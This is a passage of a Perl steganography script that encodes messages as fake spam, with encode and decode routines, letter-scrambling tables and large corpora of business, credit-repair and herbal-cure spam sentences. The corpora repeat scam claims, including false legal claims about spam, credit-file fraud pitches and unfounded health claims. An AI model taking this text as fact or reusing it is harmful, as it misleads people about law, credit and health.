$genre = 1 + int rand(3);        # Choose a random spam genre.
$endgrt = (int rand(3));        # Random ending.
$greet = $endgrt * 2;            # Greeting to go with ending above.

if ($genre == 1) {    # Load data on business spam.
&get_spamtype(“business”);
$encoded .= ($bus_start[$greet] . “\n\n” . $bus_start[$greet + 1]);
$end = $bus_end[$endgrt];
}

if ($genre == 2) {    # Load data on credit spam.
&get_spamtype(“credit”);
$encoded .= ($cre_start[$greet] . “\n\n” . $cre_start[$greet + 1]);
$end = $cre_end[$endgrt];
}

if ($genre == 3) {    # Load data on miracle cure spam.
&get_spamtype(“cures”);
$encoded .= ($cur_start[$greet] . “\n\n” . $cur_start[$greet + 1]);
$end = $cur_end[$endgrt];
}

@arrmsg = split //, $message;

foreach $char (@arrmsg) {

if ($char eq ” “) {        # Spaces become punctuation
&addpunct(“last”);    # Add more punctuation to encode
# a space [eg. '.' -> '..']
} else {
&addpunct;        # &addpunct gets sneaky here in
# how it adds things, it makes
# sure that it wasn’t intending
# to start a new paragraph, as
# it does sometimes.

$char = &munge($char);    # Make the spam less repetetive.

if (defined $tospam[$getindx{$char}]) {    # Writes out a line of spam.
my $curpunct = &peekpunct;     # Find punctuation to use.
$encoded .= ” ” . $tospam[$getindx{$char}] . $curpunct;

} else {        # Warn about unencodeable chars.
$corrupted = 1;
$char = &escHTML($char);
$debug_info .= ” Didn’t know how to encode [ $char ] ” if $verbose;
}
}
}

$encoded .= (” \n\n” . $end . ” ” . $pad);    # Write out appropriate ending.
&ourFORM($encoded);                # Print out the spam.
exit;    # Explicit.
}

##########
# decode #
##########
#
# Turns a message back to normal.  It first checks to see which beginning tag you used.  If it
# doesn’t find any of them, it reports an error.  Otherwise, it strips off everything between
# the beginning tag it found and the ending tag that goes with that [it reports an error if it
# cannot find the end tag, but valiantly attempts to decode what it can, first].  From the tags
# it finds, it deduces the proper genre and loads the info for that sort of spam.  It then splits
# the spam on the line delimiters (! and .) and matches each line against all possible letters.
# If the line is blank, it knows that it hit a .. or !! or something, which encodes a space, so
# it adds them in there, as appropriate and changes all unknown lines to ?’s.
#

sub decode {

my ($message) = @_;
$message = &validate_spam($message);
@spltmsg = split /[.!]/, $message;
$decoded = “”;

for (@spltmsg) {    # Remove extra whitespace so it doesn’t hinder matches.
s/^\s+//;
s/\s+$//;
}

TRANS: foreach $line (@spltmsg) {

if ($line =~ /^[\s]?$/o) {    # Decode spaces, which become
# blank lines after the split
$decoded .= ” “;    # since they were extra
# punctuation (.!) before.
next TRANS;
}

for (my $i = $[; $i < $#tospam; ++$i) { # Just in case you changed $[
# Figure out what symbol it is supposed to be.
if ($line eq $tospam[$i]) {
$decoded .= munge($indx[$i]); # Descramble it.
next TRANS;
}
}

$line = &escHTML($line);
$debug_info .= ” Didn’t understand [ $line ] in spammish. ” if $verbose;
$decoded .= “?”;    # Corrupted data :[
$corrupted = 1;
}

&ourFORM($decoded);
exit;    # Explicit.
}

#################
# validate_spam #
#################
#
# Figure out if it's one of our spams.  It looks for beginning and ending tags [if they're not
# found, it reports an error] and strips out everything between those tags.  It then figures
# out the genre of spam it just matched and loads the info for that type of spam and goes back
# to &decode which actually decodes the spam.
#

sub validate_spam {

my ($message) = @_;
$message =~ s/[\n\r]/ /g;    # Collapse it into one long line.
$message =~ s/\s+/ /g;        # Remove extra whitespace which may have snuck in.

# Now see if this is one of *our* spams.  Spam
# headers are 2 lines, here I only care about
# every 2nd line, which is at 1, 3 & 5 in the
# array.  I hope you guys aren’t using $[ but
# if you are this works, since I check against
# $[ - 1 rather than just -1.

FIND: {
my $pos;
for (my $i = 1; $i < 6; $i += 2) {

$pos = index($message, $bus_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("business");        # Load data on the buisness genre.
$pos += length($bus_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i – 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $bus_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupted = "1";        # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

$pos = index($message, $cre_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("credit");        # Load data on the credit genre.
$pos += length($cre_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i – 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $cre_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupted = 1;            # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

$pos = index($message, $cur_start[$i]);
if ($pos != ($[ - 1)) {                # If it matched...
&get_spamtype("cures");            # Load data on the miracle cure genre.
$pos += length($cur_start[$i]);        # Move to the end of the start tag.
$message = substr($message, $pos);    # Grab everything after the start tag.
$i = int ($i – 1) / 2;            # Correct $i, since the arrays are goofy.
$pos = index($message, $cur_end[$i]);    # Find the end of the data.
if ($pos == ($[ - 1)) {            # If it failed...
$corrupted = 1;        # Warn about missing/corrupted data.
$debug_info .= " No ending tag found. " if $verbose;
} else {
$message = substr($message, 0, $pos);    # Strip off the ending tag and anything after it.
}
last FIND;    # Go translate it now.
}

}

# This isn't one of our spams.
&ourFORM("Sorry, that spam doesn't contain any hidden messages!");
exit;    # Explicit.

}; # Go on to translate the spam.

return $message;

}

############
# addpunct #
############
#
# This function generates random !'s and .'s to punctuate the spam and to encode
# spaces (they are encoded as one extra punctuation mark in the spam for each
# space encoded, eg. ! -> !! for one space). It also adds newlines every so often
# to form simulated paragraphs about every 4-8 lines of spam, so it doesn't look
# like one big, long & ugly block of jibberish.  It operates on the assumption that
# $encoded is both visible to it and holds the text to be encoded.
#

{    # This block holds some variables for &addpunct so they aren't exposed.

my $punctcount;
my $curpunct;
my $nextp;
my $choice;
my $first_time;

INIT {
$punctcount = 0;        # How many punctuation marks to output.
$curpunct = '!';        # Current punctuation.
$nextp = 4 + int rand(5);    # When to start the next paragraph.
$choice = 1 + int rand(3);    # The next punctuation to choose ('.' twice or '!')
$first_time = 1;        # Don't add the extra space the first time.
}

sub peekpunct {
return $curpunct;
}

sub addpunct {

my $mode = shift;

if ($mode) {    # They want what they had last time.
# No need to check if it's equal to "last" since it's
# undef the rest of the time.

if ($punctcount) {
# Add punctuation unless a new paragraph is starting.
++$punctcount;
} else {
$encoded .= $curpunct unless $first_time;
$first_time = 0;
}
return;
}

# They want some new punctuation...

if ($punctcount) {        # Start new paragraphs neatly.
$encoded .= ($curpunct x ($punctcount - 1)) . "\n\n";
$punctcount = 0;    # Sub 1 because this miscounts.
}

$choice = 1 + int rand(3);    # Choose the next punctuation.

if ($choice == 3) {
$curpunct = "!";
} else {
$curpunct = ".";
}

if (--$nextp == 0) {        # Decide when to start new paragraphs.
++$punctcount;
$nextp = 4 + int rand(5);
}

return;
}
}

#########
# munge #
#########
#
# This function scrambles the data a little so that the spam isn't quite as
# repetetive and may be slightly harder to decode.  Note that ALL routines must
# be SYMETRIC.  This means that if c -> q then q -> c and that the transforms of
# uppercase letters is the same as the one for lowercase letters (q -> c and
# Q -> C).  If you change that, the input will not match the output and you will
# wind up with garbage :]  This should give the spam a period of about one
# paragraph before repeating on average, unless you’re unlucky and it transforms
# just so.  It’s not like this will stop the NSA from decrypting this; it just
# makes it look nastier, I think.  You should not munge spaces–they’re taken
# care of separately in the encoding scheme.
#

{
# This block contains some of the initialization code for &munge
# It just helps it keep track of local variables and such while
# scrambling the data to make the same sentences repeat less often.
# It is here to keep this info private.

my $seed;    # The seed for the munger.
my $oldseed;    # The last seed used.
my $maxseed;    # This is how many munges there are below, make
# sure it’s right by reading &munge below.
my $ch;        # The charactor we’re munging in &munge.

INIT {        # Initializes some variables for these routines.

$seed = 0;
$oldseed = 0;
$maxseed = 7;
$ch = “”;
}

sub getseed {    # This advances the seed making sure it gets reset.

$oldseed = $seed;

if ($seed == $maxseed) { # Reset seed.
$seed = 0;
} else {         # Advance seed.
++$seed;
}

return $oldseed;    # They want the *old* value.
}

sub charuc {    # Swap case on an uppercase char half the time.

my $ch = shift;
$ch = lc $ch if (($seed % 2) == 1);
return $ch;
}

sub charlc {    # Swap case on a lowercase char half the time.

my $ch = shift;
$ch = uc $ch if (($seed % 2) == 1);
return $ch;
}
}

sub munge {    # Here is where we actually munge each character.

my $ch = shift;
my $seed = &getseed;

if ($ch =~ /^[a-z]$/o) {

# Do you like those tr///s?  It’s one way of enforcing the BSD license as those are
# a /pain/ to mess with :]  -xeno

LWRTRANS: {            # Transform lowercase letters.

if ($seed == 0) {    # Transform 0
$ch =~ tr/xenoaisrhldcuqzvtjkbywgpfm/qzvtjkbywgpfmxenoaisrhldcu/;
last LWRTRANS;
}

if ($seed == 1) {    # Transform 1
$ch =~ tr/xenoaisrhldcukvtmzqbjfywpg/kvtmzqbjfywpgxenoaisrhldcu/;
last LWRTRANS;
}

if ($seed == 2) {    # Transform 2
$ch =~ tr/xenotaizqjkvsfbyrchpdgwmlu/fbyrchpdgwmluxenotaizqjkvs/;
last LWRTRANS;
}

if ($seed == 3) {    # Transform 3
$ch =~ tr/xenoaibywldcuvktzprsqghjfm/vktzprsqghjfmxenoaibywldcu/;
last LWRTRANS;
}

if ($seed == 4) {    # Transform 4
$ch =~ tr/xenoshdcuzqkvglrjayibtmwfp/glrjayibtmwfpxenoshdcuzqkv/;
last LWRTRANS;
}

if ($seed == 5) {    # Transform 5
$ch =~ tr/xenotasywgpfmirlvjbkzhqcdu/irlvjbkzhqcduxenotasywgpfm/;
last LWRTRANS;
}

if ($seed == 6) {    # Transform 6
$ch =~ tr/xenozjisrgpfmtqlwcdkaubhyv/tqlwcdkaubhyvxenozjisrgpfm/;
last LWRTRANS;
}

if ($seed == 7) {    # Transform 7 – $maxseed should equal this (7).
$ch =~ tr/xenojtkbrwlcmphizadyvqsufg/phizadyvqsufgxenojtkbrwlcm/;
last LWRTRANS;
}

# We should not get here, check below & make sure the seed gets reset
# after going through the last transform above.

warn “Bad seed value $seed found in swapcaps routine.”;

}

$ch = &charlc($ch);    # Swap case half the time.
return $ch;

} elsif ($ch =~ /^[A-Z]$/o) {

UPRTRANS: {            # Transform uppercase charactors.

if ($seed == 0) {    # Transform 0
$ch =~ tr/XENOAISRHLDCUQZVTJKBYWGPFM/QZVTJKBYWGPFMXENOAISRHLDCU/;
last UPRTRANS;
}

if ($seed == 1) {    # Transform 1
$ch =~ tr/XENOAISRHLDCUKVTMZQBJFYWPG/KVTMZQBJFYWPGXENOAISRHLDCU/;
last UPRTRANS;
}

if ($seed == 2) {    # Transform 2
$ch =~ tr/XENOTAIZQJKVSFBYRCHPDGWMLU/FBYRCHPDGWMLUXENOTAIZQJKVS/;
last UPRTRANS;
}

if ($seed == 3) {    # Transform 3
$ch =~ tr/XENOAIBYWLDCUVKTZPRSQGHJFM/VKTZPRSQGHJFMXENOAIBYWLDCU/;
last UPRTRANS;
}

if ($seed == 4) {    # Transform 4
$ch =~ tr/XENOSHDCUZQKVGLRJAYIBTMWFP/GLRJAYIBTMWFPXENOSHDCUZQKV/;
last UPRTRANS;
}

if ($seed == 5) {    # Transform 5
$ch =~ tr/XENOTASYWGPFMIRLVJBKZHQCDU/IRLVJBKZHQCDUXENOTASYWGPFM/;
last UPRTRANS;
}

if ($seed == 6) {    # Transform 6
$ch =~ tr/XENOZJISRGPFMTQLWCDKAUBHYV/TQLWCDKAUBHYVXENOZJISRGPFM/;
last UPRTRANS;
}

if ($seed == 7) {    # Transform 7 – $maxseed should equal this (7).
$ch =~ tr/XENOJTKBRWLCMPHIZADYVQSUFG/PHIZADYVQSUFGXENOJTKBRWLCM/;
last UPRTRANS;
}

# If this triggers, you need to check below to ensure that the seed is
# being reset after going through all transforms above.

warn “Bad seed value $seed found in swapcaps routine.”;

}

$ch = charuc($ch);    # Switch case half the time.
return $ch;

} else {    # Mess with some of the common punctuation & numbers so they’re
# even less obvious :]

if (($seed % 2) == 1) {    # Be careful that these stay *symmetric* :]
$ch =~ tr/01234567?!@.$9)8#^(&%*/.$9)8#^(&%*01234567?!@/;
# Ugly, huh? :]  Don’t even try changing that…

} else {
$ch =~ tr/12345678@&^?).*%!#9$(0/?).*%!#9$(012345678@&^/;
# It may look like a core dump, but it’s not…
}
return $ch;
}
}

################
# get_spamtype #
################
#
# Get the info on the genre of spam we have to translate.
# Parts in the data section (@tospam) CANNOT contain
# periods (.) or exclamation marks (!) or it will encode
# extra spaces which don’t belong there or make the data
# unreadable.  Whitespace is also stripped & collapsed to
# make matches easier, since it is often changed in
# transmission.
#

sub get_spamtype {

$needs = $_[0];

INIT {    # This is always used, so we might as well load it right away.
# The number of chars here *must* correspond to the number of
# lines in EACH @tospam below, or things won’t work right.
# Be *really* careful when chaging it…

@indx = qw[a b c d e f g h i j k l m n o p q r s t u v w x y z
1 2 3 4 5 6 7 8 9 0 ( ) { } < > \ / - + * = ~ ^ $ @
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
; : . & ? ! ' " _ %];

push @indx, ‘#’, ‘,’, $fakeNL;        # So qw// won’t whine.

%getindx = undef;            # Just so Perl doesn’t whine.
for ($i = $[; $i < $#indx; ++$i) {    # Build a reverse lookup of @indx so I
$getindx{$indx[$i]} = $i;    # can find the position of any element.
}

# These are the delimiters of the spams, change them if you like, but make
# sure that you don’t add or remove any lines or it won’t work.  It’s best
# if the start blocks end with a ! or ? since the script adds a ! for the
# punctuation of a space is the first charactor of the message to encode.
# [?! or !! look better than .! :]

@bus_start = <<’EB’ =~ m/(\S.*\S)/og;
Dear E-Entrepreneur;
With all the money-making opportunities on the net why aren’t you a millionaire yet?
Dear E-Business Owner,
You could be a millionaire! Can you accept this in your life?
Dear Internet Professional -
You were referred to me as someone who was ready for a Financial Breakthrough!
EB

@bus_end = <<’EBE’ =~ m/(\S.*\S)/og;
TO BE INCLUDED IN FUTURE MAILINGS, PLEASE VISIT OUR WEBSITE!
Call 1-530-343-9681 to place your credit card order TODAY!
$$$ FINALLY YOU CAN MAKE SOME DREAMS COME TRUE! $$$
EBE

@cre_start = <<’ECR’ =~ m/(\S.*\S)/og;
Dear Businessperson:
As a technical person and a natural skeptic my initial impulse was to ignore things like this, but NO MORE!
Dear E-commerce Consultant,
Have you been dissappointed by other credit card solutions which turned out to be scams?
Dear Professional:
Give yourself the ADVANTAGE of enjoying life more with EXCELLENT CREDIT!
ECR

@cre_end = <<’ECRE’ =~ m/(\S.*\S)/og;
$$$ ENJOY YOUR NEWFOUND FINANCIAL FREEDOM $$$
CALL 1 (307) 587-9409 TO ORDER TODAY!
To Order By Phone, please call (206) 219-3312 NOW!
ECRE

@cur_start = <<’ECU’ =~ m/(\S.*\S)/og;
Dear Herbal Enthusiest;
Did you know that you can order your herbs online from Mexico at a FRACTION of the cost?
Dear Friend -
Our ALL NATURAL 100% organic herbal supplements can help you feel at your peak again!
Dear Truth seeker,
Have you been misinformed about the nearly miraculous effectiveness of modern herbal remedies?
ECU

@cur_end = <<’ECUE’ =~ m/(\S.*\S)/og;
!!! ORDER ONLINE NOW BEFORE THE MEXICAN GOVERNMENT SHUTS US DOWN !!!
Order now, you won’t regret trying our ULTRA-HIGH QUALITY herbs!
VISIT US TODAY TO DISCOVER ALL THE THINGS *THEY* DON’T WANT YOU TO KNOW!
ECUE

}    # End of preloaded spam header data block.

if ($needs eq “business”) {
$pad = qq’

Apex
Attn: R. Colbert
MailRoom Post Office Box  #0215
Coral Springs, FL 33067-0215

ORDER YOUR REPORTS TODAY AND GET STARTED ON
YOUR ROAD TO FINANCIAL FREEDOM !

Under Bill s. 1618 TITLE 3 passed by the 105th us congress, this letter
cannot be considered SPAM, as long ad the sender includes contact information
and a method of “removal”. To be removed from future mailings, just reply with
REMOVE in the subject line.

Thank-you for your kind consideration’;

# Here’s a ton of raw spam.  All of these blocks are similar for each genre.
# Don’t add or remove lines unless you’re trying to encode more charactors,
# but you can change them almost as much as you want so long as you are sure
# that none contain .’s or !’s and that none of them contains another (eg.
# that one line isn’t “Just BUY NOW” and another is “BUY NOW” which would
# confuse the script when it tried to decode them.  I personally validated
# all of these, but… :]

@tospam = <<’END_BUSINESS’ =~ m/(\S.*\S)/g;
We sell the CD Your Not Suppose to Have BUSINESS SECRETS OF THE INTERNET
Learn to make THOUSANDS of dollars per hour while Surfing the Internet for PORN
Find out how To Beat Speeding Tickets confound the cops and get off scot free
You can get Information on Anyone you want for FREE online
Your messages can reach MILLIONS for pennies just like this one
You KNOW this works since just as you are reading this message yours will be read
If you want to be successful you must copy someone who is
I am willing to teach you the secrets that I have leaned in creating Financial Independence
I am looking for a few motivated individuals who are ready to start earning BIG MONEY
This is not MLM or a pyramid scheme or a get rich quick scheme
This is a REAL Legitimate business that requires motivated parteners
With Us Everyone Gets Approved No Upfront Fees For Application-Processing
While Others Charge You HUNDREDS OF DOLLARS to Get Set Up WE CHARGE ZERO FOR SETUP FEES
This is A Limited Time Offer So Take Advantage of it
Scroll to bottom of this email for our CONTACT INFORMATION to ORDER NOW
The Internet is the fastest growing industry in today’s direct marketing business
Give your customers the convenience of ordering products right from your web page
Now tell me if this doesn’t sound intriguing
With us you will have LIQUID ASSETS AVAILABLE ALMOST IMMEDIATELY
We Also offer SOFTWARE AND TERMINAL PACKAGES to reach your customers
Our terminal will allow you to receive the LOWEST DISCOUNT RATE per transaction available
Thank You for reading this and Heres to Bigger and Better Business
Thats right seventy seven MILLION FRESH AND VALID email addresses with NO duplications
You can offer your product to the online community TODAY
Using direct marketing is easier and cheaper a LOT easier and a LOT cheaper
Contact us to receive a collection of BULK EMAIL PROGRAMS to automate your mailouts
Our programs such as Express mail and Stealth Bomber all are very user friendly
These programs usually cost around HUNDREDS but are FREE to you when you invest with us
You can set your computer in the morning and it can send emails all day by itself
If you get only a one percent response from mailing to a list thats worth THOUSANDS
Imagine how much information you could get from a short survey sent to a mailing list like ours
We have been in this business for close to TWO YEARS now
We have a lot of satisfied customers who keep coming back to us for more
We hope to do business with you continuously for years to come
We have gone through the list in the past month and deleted any old addresses
We have also deleted any known SPAM haters
Our lists include almost every person on the Internet today with no duplications
People are making TONS of money right now by doing the same thing we are
With us the more people you send to the more money you will make
With our product we will also send you a copy of every law concerning email
We make it easy to obey the law and make a fortune
This offer is not for everyone
If you can see the value in this opportunity then now is the time to TAKE ACTION
Ours is a fantastic idea which has over FOUR MILLION users already
For checks in currencies other than US dollars please find details below
ALL INFORMATION NECESSARY FOR YOU TO SUCCESSFULLY MAIL QUICKLY PROPERLY AND LEGALLY IS PROVIDED
This email contains the ENTIRE PLAN of how YOU can make BIG MONEY NOW
Just read on and see how easy this is
Since everyone makes more as more people try it out it’s been very exciting
Please read this program THEN READ IT AGAIN
Just follow the instructions and you will make money
This simplified e-mail marketing program works perfectly EVERY TIME
Email is the sales tool of the future
Take advantage of this virtually free method of advertising NOW
The longer you wait the more people will be doing business using email
The enclosed information is something I almost let slip through my fingers
I could NOT believe my eyes here was a MONEY MAKING MACHINE I could start immediately
Like most of you I was still a little skeptical and a little worried about the legal aspects
After determining the program was LEGAL I decided WHY NOT
I paid off ALL my debts and bought a much needed new car
Please take your time to read this plan IT WILL CHANGE YOUR LIFE FOREVER
This program does work but you must follow it EXACTLY
If you choose not to participate in this program I am sorry
This really is a great opportunity with little cost or risk to you
As the saying goes THE RICH GET RICHER AND THE POOR GET POORER
With us you can make more money in the next few months than you have EVER imagined
Just follow the program EXACTLY AS INSTRUCTED
Remember to email a copy of this exciting report to everyone you can think of
Remember that the more you send out the more potential customers you will reach
HERE IS HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLARS
Our method of raising capital REALLY WORKS EVERY TIME
Before you say BULL please read this program carefully
This is not a chain letter but a perfectly legal money making business
Every state in the USA allows you to recruit new multilevel business partners
WITH US ORDERS COME BY MAIL AND ARE FILLED BY EMAIL so you are not involved in personal selling
You do this privately in your own home store or office
We have the EASIEST marketing plan anywhere
Your cost to participate in this is practically nothing
Placing a lot of FREE ads on the Internet will EASILY get a larger response
You should be prompt and professional and follow the directions accurately
You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you
What you are about to read is tried and true and proven and effective
Above all our offer is utterly and ridicously excellent
Read on and weep with joy if you would like to know exactly how to begin making money
Nowhere else will you find such a complete package as this
YOU WILL SOON BE RAKING IN MONEY LIKE NOBODYS BUSINESS
This is the fastest way I have ever seen to make money
If you do not call us RIGHT NOW you will regret it for the rest of your life
Business opportunities like this do not come around every day you know
You would have to be an IDIOT not to BUY NOW
Our product is simply the BEST EVER
Unless you want to kick yourself later you MUST ORDER NOW
END_BUSINESS

foreach $line (@tospam) {    # Collapse whitespace to help matching.
s/^\s+//;
s/\s+$//;
s/\s+/ /g;
warn “Erroneous punctuation (! or .) found in business spam.” if m/[!.]/;
}

return;
}

if ($needs eq “credit”) {

$pad = qq’

FAX TOLL FREE TO 888.244.4366 or mail to:

The Credit Emporium
Attn: C. Spambert
MailRoom Post Office Box  #0715
Coral Springs, FL 33067-0215

** We respect your privacy and will not share
any of the above information with any other
persons or companies. **

………………………………………
This is a one time email transmission, either
requested by you or by someone you know. The
information provided is for educational
purposes only and FFS Ltd is not providing a
service. This offer is void where prohibited.
This cannot be considered spam as long as the
sender includes a method of removal at no cost
to the recipient as stated in bill s.1618
TITLE III passed by the 105th US Congress.
This is a one time email transmission; no need
for removal is required. If you do not respond,
FFS Lts will not contact you and you will be
automatically removed.’;

@tospam = <<’END_CREDIT’ =~ m/(\S.*\S)/g;
Good Bad or No Credit is NO PROBLEM with us
GET GUARANTEED EXCELLENT CREDIT IN THIRTY DAYS
If your credit is less than perfect then you must read this email
We have compiled a wonderful ebook GUARANTEED to give you an excellent credit rating
John Simmers tried this and removed every negative item off his credit report in two weeks
Over the last few years we have received thousands of positive letters from customers
With us FINANCIAL FREEDOM COSTS JUST A FEW DOLLARS
Print this now or save it to a folder for future reference
With us you can learn of the secret federal law that stops ALL your collection calls immediately
Thousands of Americans have used our service successfully we want YOU to be next
NO MORE will you have to be ashamed of your past
The Credit Secrets Manual reveals one of the greatest secrets in the world
Our attorneys have discovered a method of creating brand NEW credit files for their clients
With us you can destroy bad credit by taking advantage of a special consumer protection law
With us you can dump your bad credit using our suberb Credit File Replication Service
With our methods anyone can bury the past and put their bad credit behind them forever
Our service is really BONAFIDE and PROVEN to work for anyone
This product is so easy to use that a sixteen year old could do it
Thanks to us you will be in fear of your future NO MORE
All this involves is a little thinking and filling out forms and making phone calls
This product works just like THAT it is almost MAGICAL
I truly do bless the day I ordered this program YOU will too
This program has changed my life I now want it to change yours
You will be scared to apply for credit NO MORE
With us you can learn the Secret Key to getting your new credit file and how easy it is to do
We can get your new credit file without you ever leaving your house
Our goal is to make this program affordable so everyone can benefit from the power of it
Rich people have been using our secrets for years
We have a guaranteed way for legally getting an excellent credit rating almost instantly
Contact us to guarantee that you will quickly have EXCELLENT CREDIT
We will assist you in instantly adding UNLIMITED positive information to your credit file
My Proven Credit Advantage Program unconditionally guarantees you will qualify for loans
TRIPLE A ONE CREDIT IS WITHIN YOUR REACH
Our ebook tells you everything you will ever need to know
With ONE CALL we can get your creditors to leave you alone
Complete Our Simple Online Form To Receive Your Free Debt Analysis
Our programs can get you the cash you need
This all comes with our RISK FREE DOUBLE YOUR MONEY BACK GUARANTEE
If your credit isnt so great your interest rate will be higher
We can tell you the Six Credit Card Secrets Banks Dont Want You to Know
With Us You Will Learn The Guerrilla Tactics That Will Give You A Good Credit Rating
We know Surefire Methods Of Raising Instant Cash
This is NOT another credit scam OUR methods are TOTALLY LEGAL
Do NOT get suckered by the cheap waffle packed guides offered elsewhere
We will NOT waste your time with flowery sales letters and empty promises
WE are the real deal WE tell it like it IS
Sign up NOW and become part of our CASH ADVANTAGE PROGRAM
WE use the only legitimate way to get you new credit files
We can Add YEARS of AAA credit to your PERSONAL credit report in just days
You can never lie or be dishonest and STILL get the credit you need and deserve without hassle
You should follow the example of thousands of ordinary people who use this system everyday
You can use our services to maintain complete anonymity in your financial dealings
You can purchase everything you buy at below wholesale prices and on credit
Our services will NOT lead you to do anything illegal immoral or unethical
We do NOT send you on letter writing campaigns that produce no results
We will not have you to use untested methods that do not work in the real world
We will NOT make you use a bogus TIN or EIN number on credit applications
Our customers are SHOCKED at how quickly and easily they have restored their credit
We have perfected a system called the GoldPro Credit Restoration Program which is AWESOME
With us you just go through our EASY five step program to establish the credit you deserve
If you want to buy a home our methods will virtually GUARANTEE your success
With us you will now be able to easily qualify for any credit you desire
My program unconditionally guarantees that you will qualify for all kinds of loans
If you do not fix your credit you might as well throw MONEY out the window
You CAN Save Thousands of Dollars in Interest and Late Charges
We offer a NO OBLIGATION FREE CONSULTATION WITH STRICT PRIVACY
The credit industry is constantly changing to anticipate the demands of customers like you
We look forward to EARNING your business
Do not delay in ordering from us your good credit depends on it
With our help you will have ULTRA LOW INTEREST RATES
When we are finished you will have a copy of YOUR unblemished credit file
You Can Join our Lenders Network for FREE
YOU SHOULD NEVER SETTLE FOR A SINGLE QUOTE AGAIN WHEN YOU CAN GET MANY OFFERS WITH US
The information you provide to our Financial Experts will help you get the results you deserve
With us you will discover why bankruptcy may actually improve your credit rating
You can learn to Restart your life Completely Debt-Free
Find out how to stop your creditors dead in their tracks with our foolproof debt solutions
Find out how to know if you need a lawyer to help you
Let us help you get out of debt NOW
We can even help you consolidate your debts into one low monthly payment
Do not even think of filing bankrupcy without reading this message
This request is totally risk free since no obligation or costs are incurred
By working with us we can cut your payments in HALF
We have Special Programs for Self Employed Borrowers
We have programs for EVERY credit situation
You could get CASH BACK within ONE DAY of approval
Our professional debt negotiators can instantly reduce your interest rates
We WILL Get Your Creditors Off Your Back
Our credit history eraser is NOT a loan
WE ARE THE TOP ONLINE SOURCE FOR APPROVING CREDIT CHALLENGED INDIVIDUALS
With your new credit rating you will feel like a KING
You simple MUST ORDER NOW or you will regret it
Without us you might face BANKRUPCY
END_CREDIT

foreach $line (@tospam) {    # Collapse whitespace to help matching.
s/^\s+//;
s/\s+$//;
s/\s+/ /g;
warn “Erroneous punctuation (! or .) found in credit spam.” if m/[!.]/;
}

return;
}

if ($needs eq “cures”) {

$pad = qq’

Order online and save. Visit us at http://www.iscsale.com/

Please print and postal mail to:

Chess Industries
PO BOX 97-0531
Coconut Creek, FL 33097-0531

or FAX toll free to 800.708.5714.

~ ~ ~   ~ ~ ~    ~ ~ ~   ~ ~ ~   ~ ~ ~   ~ ~ ~   ~ ~ ~    ~ ~ ~
Your Email Address Removal/Deletion Instructions:

We comply with proposed federal legislation regarding unsolicited
commercial email by providing you with a method for your email address to be
permanently removed from our database and any future mailings from our
company.

To remove your address, please send an email message with the word REMOVE
in the subject line to: processrequest\@adexec.com
If you do not type the word REMOVE in the subject line,your request to be
removed will not be processed.
‘;

@tospam = <<’END_CURES’ =~ m/(\S.*\S)/g;
The results have been truly remarkable
You will understand once you try it yourself
Remember that it wont work if you don’t try it
Please delete this now if such messages are annoying to you
You have been invited to participate in a thirty day free trial
This is an UNBELIEVEABLE OFFER for the Ultimate Herbal Experience
Absolutely LEGAL and Marvelously POTENT
Kiff possess all of the positive virtues fine ganja or cannabis without any of the negatives
These all have NO side effects NO dependency and are Vivaciously Mellow
It is formulated in accordance with the Taoist herbal principle of botanical interactiveness
All products are Satisfaction Guaranteed you will NOT want to miss out on them
TRY THE BODY MIND AND SPIRIT HEAVENLY INTRO COMBINATION OFFER
GET THIS Erotic Aphrodisia it is a wonderful Sexual Intensifier
These are made with herbs of Power which are master blended to emphasize body mind and spirit
Our products are best when taken upon an empty stomach
Persons taking any precsription medication should consult with their health care providers
Try our obscure multidimensional singular leafy smoking and brewing ethnobotanicals
TRY our LEGAL CANNABIS ALTERNATIVES they will help you MeLoW OuT
There is ABSOLUTELY nothing else quite like our herbs
Our HERBS are blended according to ancient Tanatric methods of exploring the pleasure of SEX
Using these herbs you can explore ancient and exotic SEXUAL EXPEREMENTS LEGALLY
I guarantee your life will never be the same again SEEING IS BELIEVING
I truly look forward to making you another SATISFIED CLIENT
Use our herbs to enjoy Tantra which is the art of CARNAL SEXUAL exploration
These herbs are major mood enhancers they make you feel HAPPY and SERENE
Our ginsing increases physical and mental endurance MASSIVELY
The ginsenosides in our ginsing have bee proven to help the body to respond to stress
This offer is NOT available in stores
Order now and get a FREE herb pipe for your SMOKING PLEASURE
Use our viripotent cannabis alternatives for blissful regressions of vexatious depressions
Our kiff is indeed the BEST marijuana or cannabis alternative on the planet
Our amalgamations are high concentrates of rare euphoric herbas for maximum PLEASURE
We use only the highest quality Chavana Prash and Black Seed Herbs in our amalgams
We have tons of hard to get Asian Herbs for Serenity and Joyful Living
With these herbs you can experience the dynamic energization of body mind and spirit
Our special compounds prolificate molecular communion to achieve herbal efficaciousness
Every item is always on sale on our website so visit there NOW
Many people do not realize the hidden dangers of Excessive Stress in their lives
Everyone at one time or another can use a health enhancing vitamin supplement or herbal remedy
The ISC Wellness Association can help you find the perfect gift
Try these today and feel the energy flow you need to get things done
Stress has often been referred to as a silent killer
We have just what you are looking for
CARE FOR YOUR SKIN THE WAY NATURE INTENDED
Put your best face forward by using our Skin Care Products
Most people love the natural nourishing qualities of our products and you will too
We offer more than just vitamins herbs and supplements
While the FDA will not allow us to call this a miracle cure we do not know what else to call it
Clinical tests of our products have show that they enhance SEXUAL ECTASY
Use our androstenedione to unlock your natural sexual potential
These offers are NOT available in stores
Try our tribulus terrestis to increase Luteinzing hormone levels
